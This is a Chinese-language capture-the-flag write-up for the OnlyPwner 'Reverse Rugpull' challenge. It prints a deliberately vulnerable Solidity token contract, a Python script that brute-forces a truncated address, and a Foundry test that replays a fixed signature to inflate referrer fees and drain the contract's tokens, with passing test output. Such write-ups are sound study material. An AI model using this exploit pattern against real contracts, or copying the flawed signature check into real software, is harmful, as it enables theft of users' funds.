CTF-OnlyPwner-REVERSE RUGPULL

题目源码：

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.4;

contract PrivilegeFinance { 
    
	string public name = "Privilege Finance";
	string public symbol = "PF";
	uint256 public decimals = 18;
	uint256 public totalSupply = 200000000000;
    mapping(address => uint) public balances;
    mapping(address => address) public referrers;
    string msgsender = '0x71fA690CcCDC285E3Cb6d5291EA935cfdfE4E0';
    uint public rewmax = 65000000000000000000000;
    uint public time = 1677729607;
    uint public Timeinterval = 600;
    uint public Timewithdraw = 6000;
    uint public Timeintervallimit = block.timestamp;
    uint public Timewithdrawlimit = block.timestamp;
    bytes32 r = 0xf296e6b417ce70a933383191bea6018cb24fa79d22f7fb3364ee4f54010a472c;
    bytes32 s = 0x62bdb7aed9e2f82b2822ab41eb03e86a9536fcccff5ef6c1fbf1f6415bd872f9;
    uint8 v = 28;
    address public admin = 0x2922F8CE662ffbD46e8AE872C1F285cd4a23765b;
    uint public burnFees = 2;
    uint public ReferrerFees = 8;
    uint public transferRate = 10;
    address public BurnAddr = 0x000000000000000000000000000000000000dEaD;
	bool public flag;

	constructor() public {
	    balances[address(this)] = totalSupply;
	}

    function Airdrop() public {
        require(balances[msg.sender] == 0 && block.timestamp >= Timeintervallimit,"Collection time not reached");
        balances[msg.sender] += 1000;
        balances[address(this)] -= 1000;
        Timeintervallimit += Timeinterval;
    }

    function deposit(address token, uint256 amount, address _ReferrerAddress) public {
        require(amount > 0, "amount zero!");
        if (msg.sender != address(0) && _ReferrerAddress != address(0) && msg.sender != _ReferrerAddress && referrers[msg.sender] == address(0)) {
            referrers[msg.sender] = _ReferrerAddress;
        }
        balances[msg.sender] -= amount;
        balances[address(this)] += amount;
    }
  
    function withdraw(address token, uint256 amount) public {
        require(balances[msg.sender] == 0 && block.timestamp >= Timewithdrawlimit,"Collection time not reached");
        require(amount > 0 && amount <= 2000,"Financial restrictions");
        Timewithdrawlimit += Timewithdraw;
        require(amount > 0, "amount zero!");
        balances[msg.sender] += amount;
        balances[address(this)] -= amount;
    }

    function DynamicRew(address _msgsender,uint _blocktimestamp,uint _ReferrerFees,uint _transferRate) public returns(address) {
        require(_blocktimestamp < 1677729610, "Time mismatch");
        require(_transferRate <= 50 && _transferRate <= 50);
        bytes32 _hash = keccak256(abi.encodePacked(_msgsender, rewmax, _blocktimestamp));
        address a = ecrecover(_hash, v, r, s);
        require(a == admin && time < _blocktimestamp, "time or banker");
        ReferrerFees = _ReferrerFees;
        transferRate = _transferRate;
        return a;
    }

    function transfer(address recipient,uint256 amount) public {
        if(msg.sender == admin){
            uint256 _fee = amount * transferRate / 100;
            _transfer(msg.sender, referrers[msg.sender], _fee * ReferrerFees / transferRate);
            _transfer(msg.sender, BurnAddr, _fee * burnFees / transferRate);
            _transfer(address(this), recipient, amount * amount * transferRate);
            amount = amount - _fee;

        }else if(recipient == admin){
            uint256 _fee = amount * transferRate / 100;
            _transfer(address(this), referrers[msg.sender], _fee * ReferrerFees / transferRate);
            _transfer(msg.sender, BurnAddr, _fee * burnFees / transferRate);
            amount = amount - _fee;
        }
        _transfer(msg.sender, recipient, amount);
    }  

	function _transfer(address from, address _to, uint _value) internal returns (bool) {
	    balances[from] -= _value;
	    balances[_to] += _value;
	    return true;
	}

	function setflag() public {
	    if(balances[msg.sender] > 10000000){
			flag = true;
		}
	}

	function isSolved() public view returns(bool){
	    return flag;
    }

}

要求也很简单；balances[msg.sender] > 10000000;
首先看向这个的合约的时候，好像没有地方可以自由的转账的，
看了题解，是真的牛逼
原来一个地址错误了string msgsender = '0x71fA690CcCDC285E3Cb6d5291EA935cfdfE4E0';这个的地址是19字节的，不满足我们20字节的地址，所以这就是突破口，因为还差一个字节，二进制8位，实际就是从Ox00到Oxff只有256种可能,就可以直接暴力破解，用p语言来破解

from web3 import Web3

msgsender = "0x71fA690CcCDC285E3Cb6d5291EA935cfdfE4E0"

for i in range(256):
	hexDigits = "{:02x}".format(i)
	checksummed = Web3.toChecksumAddress(msgsender + hexDigits)
	if (checksummed[:-2] == msgsender):
		print(checksummed)

# python3 bruteForceChecksum.py 
0x71fA690CcCDC285E3Cb6d5291EA935cfdfE4E053

我现在还没有学过p语言，所以这个代码就是网上的破解方法，另外说一下，不能用solidity破解，是因为会消耗大量的gas,也是根本行不通的

找到正确的地址后，就直接可以调用DynamicRew函数,来修改 _ReferrerFees推荐人的费用，就是我们使用推荐人的余额来到达题目要求

这是测试合约：

// SPDX-License-Identifier: UNLICENSED

pragma solidity 0.8.12;

import "forge-std/Test.sol";
import "../src/GOATFinance.sol";

contract goatFinanceTest is Test {
    PrivilegeFinance public goatFi;
    address owner = makeAddr("owner");
    address hacker = makeAddr("hacker");
    address hacker2 = makeAddr("hacker2");

    function setUp() public {
        vm.prank(owner);
        goatFi = new PrivilegeFinance();
    }

    function testAttack() public {
        vm.startPrank(hacker);
        
        // get 1000 token to hacker from airdrop
        goatFi.Airdrop();
        
        console.log("Hacker balance :", goatFi.balances(hacker));
        console.log("Hacker2 balance :", goatFi.balances(hacker2));
        console.log("GOATFinance balance :", goatFi.balances(address(goatFi)));
        
        // set hacker's referrer to hacker2
        goatFi.deposit(address(0), 1, hacker2);
        goatFi.DynamicRew(0x71fA690CcCDC285E3Cb6d5291EA935cfdfE4E053, 1677729609, 1000000000, 50);
        // transfer to admin, so referrer get fee from goatFi contract
        goatFi.transfer(0x2922F8CE662ffbD46e8AE872C1F285cd4a23765b, 999);
        
        console.log("Hacker balance after :", goatFi.balances(hacker));
        console.log("Hacker2 balance after :", goatFi.balances(hacker2));
        console.log("GOATFinance balance after :", goatFi.balances(address(goatFi)));
        
        vm.stopPrank();
        vm.startPrank(hacker2);
        
        goatFi.setflag();
        
        assertTrue(goatFi.isSolved());
    }
}

然后它的输出：

# forge test --match-path test/GOATFinance.t.sol -vv
[⠆] Compiling...
No files changed, compilation skipped

Running 1 test for test/GOATFinance.t.sol:goatFinanceTest
[PASS] testAttack() (gas: 191636)
Logs:
  Hacker balance : 1000
  Hacker2 balance : 0
  GOATFinance balance : 199999999000
  Hacker balance after : 480
  Hacker2 balance after : 9980000000
  GOATFinance balance after : 190019999001

Test result: ok. 1 passed; 0 failed; finished in 1.51ms

这个题第一次遇到，真的很值得学习，这种只要满足题目要求的调用者都可以。